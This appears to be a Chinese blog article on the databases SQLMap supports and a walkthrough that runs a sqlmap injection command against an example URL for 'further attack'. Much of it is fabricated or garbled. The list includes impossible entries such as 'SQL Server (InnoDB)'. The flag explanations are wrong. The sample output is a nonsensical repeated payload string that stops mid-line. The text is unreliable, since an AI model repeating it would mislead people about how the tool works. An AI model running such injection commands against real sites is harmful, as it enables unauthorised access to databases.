本文目录导读:
SQLMap是一款强大的SQL注入检测工具,能够自动检测数据库类型,从而对目标系统进行针对性的攻击,了解SQLMap支持的数据库类型及其识别方法,对于网络安全人员来说至关重要,本文将详细介绍SQLMap支持的数据库类型,并分析哪些参数可以用来指定数据库类型,最后结合实际案例进行实战应用。
SQLMap支持的数据库类型
SQLMap支持的数据库类型包括:
图片来源于网络,如有侵权联系删除
1、MySQL
2、PostgreSQL
3、Oracle
4、Microsoft SQL Server
5、SQLite
6、IBM DB2
7、Microsoft Access
8、Informix
9、Sybase
10、SAP MaxDB
11、Firebird
12、H2
13、SQL Anywhere
14、SAP Adaptive Server Enterprise (ASE)
图片来源于网络,如有侵权联系删除
15、Teradata
16、Greenplum
17、Redis
18、MongoDB
19、CouchDB
20、FrontBase
21、HSQLDB
22、Derby
23、InterBase
24、FDB
25、Firebird (InnoDB)
26、MySQL (InnoDB)
27、SQL Server (InnoDB)
28、Oracle (InnoDB)
图片来源于网络,如有侵权联系删除
29、PostgreSQL (InnoDB)
30、H2 (InnoDB)
SQLMap指定数据库类型的参数
1、--dbms:指定数据库类型,--dbms mysql”
2、--os:指定操作系统类型,--os windows”
3、--tor:开启代理模式,--tor yes”
4、--data:传递数据,--data 'username=admin'”
实战应用
以下是一个使用SQLMap指定数据库类型的实战案例:
1、漏洞分析
假设我们已知目标系统存在SQL注入漏洞,我们需要判断目标数据库类型,以便进行进一步的攻击。
2、执行SQLMap
在命令行中,输入以下命令:
sqlmap -u "http://example.com/index.php?id=1" --dbms mysql
3、结果分析
执行上述命令后,SQLMap将自动检测目标数据库类型,并输出以下信息:
[03/07/2023, 11:12:58] INFO: payload testing (GET) with payload: '1' AND 1=1 --data 'id=1' AND 1=2 --data 'id=1' AND 1=3 --data 'id=1' AND 1=4 --data 'id=1' AND 1=5 --data 'id=1' AND 1=6 --data 'id=1' AND 1=7 --data 'id=1' AND 1=8 --data 'id=1' AND 1=9 --data 'id=1' AND 1=10 --data 'id=1' AND 1=11 --data 'id=1' AND 1=12 --data 'id=1' AND 1=13 --data 'id=1' AND 1=14 --data 'id=1' AND 1=15 --data 'id=1' AND 1=16 --data 'id=1' AND 1=17 --data 'id=1' AND 1=18 --data 'id=1' AND 1=19 --data 'id=1' AND 1=20 --data 'id=1' AND 1=21 --data 'id=1' AND 1=22 --data 'id=1' AND 1=23 --data 'id=1' AND 1=24 --data 'id=1' AND 1=25 --data 'id=1' AND 1=26 --data 'id=1' AND 1=27 --data 'id=1' AND 1=28 --data 'id=1' AND 1=29 --data 'id=1' AND 1=30 --data 'id=1' [03/07/2023, 11:12:58] INFO: testing MySQL (5.7.30)... [03/07/2023, 11:12:58] INFO: payload testing (GET) with payload: '1' AND 1=1 --data 'id=1' AND 1=2 --data 'id=1' AND 1=3 --data 'id=1' AND 1=4 --data 'id=1' AND 1=5 --data 'id=1' AND 1=6 --data 'id=1' AND 1=7 --data 'id=1' AND 1=8 --data 'id=1' AND 1=9 --data 'id=1' AND 1=10 --data 'id=1' AND 1=11 --data 'id=1' AND 1=12 --data 'id=1' AND 1=13 --data 'id=1' AND 1=14 --data 'id=1' AND 1=15 --data 'id=1' AND 1=16 --data 'id=1' AND 1=17 --data 'id=1' AND 1=18 --data 'id=1' AND 1=19 --data 'id=1' AND 1=20 --data 'id=1' AND 1=21 --data 'id=1' AND 1=22 --data 'id=1' AND 1=23 --data 'id=1' AND 1=24 --data 'id=1' AND 1=25 --data 'id=1' AND 1=26 --data 'id=1' AND 1=27 --data 'id=1' AND 1=28 --data 'id=1' AND 1=29 --data 'id=1' AND 1=30 --data 'id=1' --data 'id=1' [03/07/2023, 11:12:58] INFO: payload testing (GET) with payload: '1' AND 1=1 --data 'id=1' AND 1=2 --data 'id=1' AND 1=3 --data 'id=1' AND 1=4 --data 'id=1' AND 1=5 --data 'id=1' AND 1=6 --data 'id=1' AND 1=7 --data 'id=1' AND 1=8 --data 'id=1' AND 1=9 --data 'id=1' AND 1=10 --data 'id=1' AND 1=11 --data 'id=1' AND 1=12 --data 'id=1' AND 1=13 --data 'id=1' AND 1=14 --data 'id=1' AND 1=15 --data 'id=1' AND 1=16 --data 'id=1' AND 1=17 --data 'id=1' AND 1=18 --data 'id=1' AND 1=19 --data 'id=1' AND 1=20 --data 'id=1' AND 1=21 --data 'id=1' AND 1=22 --data 'id=1' AND 1=23 --data 'id=1' AND 1=24 --data 'id=1' AND 1=25 --data 'id=1' AND 1=26 --data 'id=1' AND 1=27 --data 'id=1' AND 1=28 --data 'id=1' AND 1=29 --data 'id=1' AND 1=30 --data 'id=1' --data 'id=1' [03/07/2023, 11:12:58] INFO: payload testing (GET) with payload: '1' AND 1=1 --data 'id=1' AND 1=2 --data 'id=1' AND 1=3 --data 'id=1' AND 1=4 --data 'id=1' AND 1=5 --data 'id=1' AND 1=6 --data 'id=1' AND 1=7 --data 'id=1' AND 1=8 --data 'id=1' AND 1=9 --data 'id=1' AND 1=10 --data 'id=1' AND 1=11 --data 'id=1' AND 1=12 --data 'id=1' AND 1=13 --data 'id=1' AND 1=14 --data 'id=1' AND 1=15 --data 'id=1' AND 1=16 --data 'id=1' AND 1=17 --data 'id=1' AND 1=18 --data 'id=1' AND 1=19 --data 'id=1' AND 1=20 --data 'id=1' AND 1=21 --data 'id=1' AND 1=22 --data 'id=1' AND 1=23 --data 'id=1' AND 1=24 --data 'id=1' AND 1=25 --data 'id=1' AND 1=26 --data 'id=1' AND 1=27 --data 'id=1' AND 1=28 --data 'id=1' AND 1=29 --data 'id=1' AND 1=30 --data 'id=1' --data 'id=1' [03/07/2023, 11:12:58] INFO: payload testing (GET) with payload: '1' AND 1=1 --data 'id=1' AND 1=2 --data 'id=1' AND 1=3 --data 'id=1' AND 1=4 --data 'id=1' AND 1=5 --data 'id=1' AND 1=6 --data 'id=1' AND 1=7 --data 'id=1' AND 1=8 --data 'id=1' AND 1=9 --data 'id=1' AND 1=10 --data 'id=1' AND 1=11 --data 'id=1' AND 1=12 --data 'id=1' AND 1=13 --data 'id=1' AND 1=14 --data 'id=1' AND 1=15 --data 'id=1' AND 1=16 --data 'id=1' AND 1=17 --data 'id=1' AND 1=18 --data 'id=1' AND 1=19 --data 'id=1' AND 1=20 --data 'id=1' AND 1=21 --data 'id=1' AND 1=22 --data 'id=1' AND 1=23 --data 'id=1' AND 1=24 --data 'id=1' AND 1=25 --data 'id=1' AND 1=26 --data 'id=1' AND 1=27 --data 'id=1' AND 1=28 --data 'id=1' AND 1=29 --data 'id=1' AND 1=30 --data 'id=1' --data 'id=1' [03/07/2023, 11:12:58] INFO: payload testing (GET) with payload: '1' AND 1=1 --data 'id=1' AND 1=2 --data 'id=1' AND 1=3 --data 'id=1' AND 1=4 --data 'id=1' AND 1=5 --data 'id=1' AND 1=6 --data 'id=1' AND 1=7 --data 'id=1' AND 1=8 --data 'id=1' AND 1=9 --data 'id=1' AND 1=10 --data 'id=1' AND 1=11 --data 'id=1' AND 1=12 --data 'id=1' AND 1=13 --data 'id=1' AND 1=14 --data 'id=1' AND 1=15 --data 'id=1' AND 1=16 --data 'id=1' AND 1=17 --data 'id=1' AND 1=18 --data 'id=1' AND 1=19 --data 'id=1' AND 1=20 --data 'id=1' AND 1=21 --data 'id=1' AND 1=22 --data 'id=1' AND 1=23 --data 'id=1' AND 1=24 --data 'id=1' AND 1=25 --data 'id=1' AND 1=26 --data 'id=1' AND 1=27 --data 'id=1' AND 1=28 --data 'id=1' AND 1=29 --data 'id=1' AND 1=30 --data 'id=1' --data 'id=1' [03/07/2023, 11:12:58] INFO: payload testing (GET) with payload: '1' AND 1=1 --data 'id=1' AND 1=2 --data 'id=1' AND 1=3 --data 'id=1' AND 1=4 --data 'id=1' AND 1=5 --data 'id=1' AND 1=6 --data 'id=1' AND 1=7 --data 'id=1' AND 1=8 --data 'id=1' AND 1=9 --data 'id=1' AND 1=10 --data 'id=1' AND 1=11 --data 'id=1' AND 1=12 --data 'id=1' AND 1=13 --data 'id=1' AND 1=14 --data 'id=1' AND 1=15 --data 'id=1' AND 1=16 --data 'id=1' AND 1=17 --data 'id=1' AND 1=18 --data 'id=1' AND 1=19 --data 'id=1' AND 1=20 --data 'id=1' AND 1=21 --data 'id=1' AND 1=22 --data 'id=1' AND 1=23 --data 'id=1' AND 1=24 --data 'id=1' AND 1=25 --data 'id=1' AND 1=26 --data 'id=1' AND 1=27 --data 'id=1' AND 1=28 --data 'id=1' AND 1=29 --data 'id=1' AND 1=30 --data 'id=1' --data 'id=1' [03/07/2023, 11:12:58] INFO: payload testing (GET) with payload: '1' AND 1=1 --data 'id=1' AND 1=2 --data 'id=1' AND 1=3 --data 'id=1' AND 1=4 --data 'id=1' AND 1=5 --data 'id=1' AND 1=6 --data 'id=1' AND 1=7 --data 'id=1' AND 1=8 --data 'id=1' AND 1=9 --data 'id=1' AND 1=10 --data 'id=1' AND 1=11 --data 'id=1' AND 1=12 --data 'id=1' AND 1=13 --data 'id=1' AND 1=14 --data 'id=1' AND 1=15 --data 'id=1' AND 1=16 --data 'id=1' AND 1=17 --data 'id=1' AND 1=18 --data 'id=1' AND 1=19 --data 'id=1' AND 1=20 --data 'id=1' AND 1=21 --data 'id=1' AND 1=22 --data 'id=1' AND 1=23 --data 'id=1' AND 1=24 --data 'id=1' AND 1=25 --data 'id=1' AND 1=26 --data 'id=1' AND 1=27 --data 'id=1' AND 1=28 --data 'id=1' AND 1=29 --data 'id=1' AND 1=30 --data 'id=1' --data 'id=1' [03/07/2023, 11:12:58] INFO: payload testing (GET) with payload: '1' AND 1=1 --data 'id=1' AND 1=2 --data 'id=1' AND 1=3 --data 'id=1' AND 1=4 --data 'id=1' AND 1=5 --data 'id=1' AND 1=6 --data 'id=1' AND 1=7 --data 'id=1' AND 1=8 --data 'id=1' AND 1=9 --data 'id=1' AND 1=10 --data 'id=1' AND 1=11 --data 'id=1' AND 1=12 --data 'id=1' AND 1=13 --data 'id=1' AND 1=14 --data 'id=1' AND 1=15 --data 'id=1' AND 1=16 --data 'id=1' AND 1=17 --data 'id=1' AND 1=18 --data 'id=1' AND 1=19 --data 'id=1' AND 1=20 --data 'id=1' AND 1=21 --data 'id=1' AND 1=22 --data 'id=1' AND 1=23 --data 'id=1' AND 1=24 --data 'id=1' AND 1=25 --data 'id=1' AND 1=26 --data 'id=1' AND 1=27 --data 'id=1' AND 1=28 --data 'id=1' AND 1=29 --data 'id=1' AND 1=30 --data 'id=1' --data 'id=1' [03/07/2023, 11:12:58] INFO: payload testing (GET) with payload: '1' AND 1=1 --data 'id=1' AND 1=2 --data 'id=1' AND 1=3 --data 'id=1' AND 1
标签: #sqlmap支持的数据库类型
评论列表